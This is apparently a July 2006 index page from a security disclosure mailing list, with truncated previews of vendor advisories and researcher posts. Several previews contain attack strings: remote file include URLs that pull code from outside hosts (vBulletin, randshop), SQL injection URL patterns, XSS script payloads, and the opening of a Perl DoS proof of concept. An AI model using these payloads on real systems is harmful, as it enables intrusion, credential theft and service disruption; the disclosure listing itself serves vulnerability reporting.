|
|
Colapse all |
Post message
[USN-309-1] libmms vulnerability 2006-07-05 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-309-1 July 05, 2006 libmms vulnerability CVE-2006-2200 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 This advisory [ more ] [ reply ] [USN-308-1] shadow vulnerability 2006-07-05 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-308-1 July 05, 2006 shadow vulnerability =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS [ more ] [ reply ] Public Advisory: Horde 3.1.1, 3.0.10 Multiple Security Issues 2006-07-05 Moritz Naumann (securityfocus com moritz-naumann com) [SECURITY] [DSA 1104-2] New OpenOffice.org packages fix arbitrary code execution 2006-07-06 joey infodrom org (Martin Schulze) TigerTom Scripts 2006-07-05 luny youf**ktard com TigerTom Scripts Homepage: http://www.ttfreeware.co.uk/ Affected files: TTCalc script v1.0 --------------------------- Data pased in the "Length of loan, years" and "Length of mortgage, years" input boxes are not sanatized before being generated. For a PoC in the input boxes listed [ more ] [ reply ] vBulletin 3.5.4 (install_path) Exploit 2006-07-05 CarcaBotx yahoo com vBulletin 3.5.4 (install_path) Exploit - by: CarcaBot - application : vbulletin - URL : http://www.vbulletin.com - Exploit: www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://CarcaB ot.Ro - More Details: Dump SQL DB named user then u have access at all md5 users passwords [ more ] [ reply ] [ MDKSA-2006:116 ] - Updated kernel packages fixes multiple vulnerabilities 2006-07-05 security mandriva com BLOG:CMS 4.1.0 SQL injection File Include Vulnerability 2006-07-05 securityconnection gmail com BLOG:CMS 4.1.0 http://blogcms.com ------------- SQL injection ------------- http://target.xx/?1'[SQL] http://target.xx/?item='[SQL] http://target.xx/?blog='[SQL] http://target.xx/?member='[SQL] http://target.xx/?typeface=1'[SQL] http://target.xx/?results='[SQL] http://target.xx/?DokuWiki= [ more ] [ reply ] sNews 1.3 XSS SQL 2006-07-05 securityconnection gmail com sNews 1.3 http://snews.solucija.com -------------------------- Cross Site Scripting (XSS) -------------------------- POST http://target.xx:80/index.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 88 pojam=<script>alert(/EllipsisSecur [ more ] [ reply ] Invision Power Board "v1.X & 2.X" SQL Injection 2006-07-04 CrAzY CrAcKeR hotmail com ================================ Discovered By: CrAzY CrAcKeR ================================ Example:- /index.php?act=ketqua&code=showcat&idcat=[SQL] /index.php?act=Attach&type=post&id=[SQL] /index.php?act=Profile&CODE=[SQL] /index.php?act=ketqua&code=[SQL] /coins_list.php?member_id=[SQL [ more ] [ reply ] file include exploits in randshop v1.2 2006-07-04 black code (black-cod3 hotmail com) (1 replies) file include exploits in randshop v1.2 forum type : randshop v1.2 bug found by : black-code team : site-down type : file include #################################################### Exploits : http://www.example.com/randshop/index.php?incl=http://evilscript? ##################################### [ more ] [ reply ] [scip_Advisory 2351] Kyberna AG ky2help various form fields SQL Injection 2006-07-04 Marc Ruef (maru scip ch) Kyberna AG ky2help various form fields SQL Injection scip AG Vulnerability ID 2351 (07/04/2005) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2351 I. INTRODUCTION Kyberna ky2help is a commercial solution for a web-based ticketing and support system. Users are able to send tickets and those are [ more ] [ reply ] [scip_Advisory 2352] F5 FirePass 4100 prior 6.x multiple Cross Site Scripting 2006-07-04 Marc Ruef (maru scip ch) F5 FirePass 4100 prior 6.x multiple Cross Site Scripting scip AG Vulnerability ID 2352 (07/04/2006) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2352 I. INTRODUCTION F5 FirePass is an appliance which allows a remote communication between SSL-VPN endpoints. This secure connectivity to corporate [ more ] [ reply ] TBE 4.0 XSS 2006-07-03 securityconnection gmail com The Banner Engine - tbe4.0 Native Solutions -------------------------- Cross Site Scripting (XSS) -------------------------- http://target.xx/top.php?action=search&catid=catid&text=%3Cscript%3Ealer t(%22Ellipsis+Security+Test%22)%3C/script%3E http://target.xx/top.php?action=search&catid=catid&t [ more ] [ reply ] imgsvr dos exploit by n00b 2006-07-03 co296 aol com I have provided the fillowing proof of concept.. Afected-softwear Credit's :n00b. http://freshmeat.net/projects/imgsvr/ Exploit, #!/usr/bin/perl ##Proof of concept. ######################################################################## ######### #Credit's:to n00b for finding this bug. [ more ] [ reply ] ZoneAlarm Insufficient protection of registry key 'VETFDDNT\Enum' Vulnerability 2006-07-03 David Matousek (david matousec com) ZoneAlarm insufficiently checks calling standard Windows API functions RegSaveKey, RegRestoreKey and RegDeleteKey. The whole advisory with more details is available here http://www.matousec.com/info/advisories/ZoneAlarm-Insufficient-protectio n-of-registry-key-VETFDDNT-Enum.php Regards, -- David [ more ] [ reply ] |
|
Privacy Statement |
Ubuntu Security Notice USN-310-1 July 05, 2006
ppp vulnerability
CVE-2006-2194
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06 LTS
[ more ] [ reply ]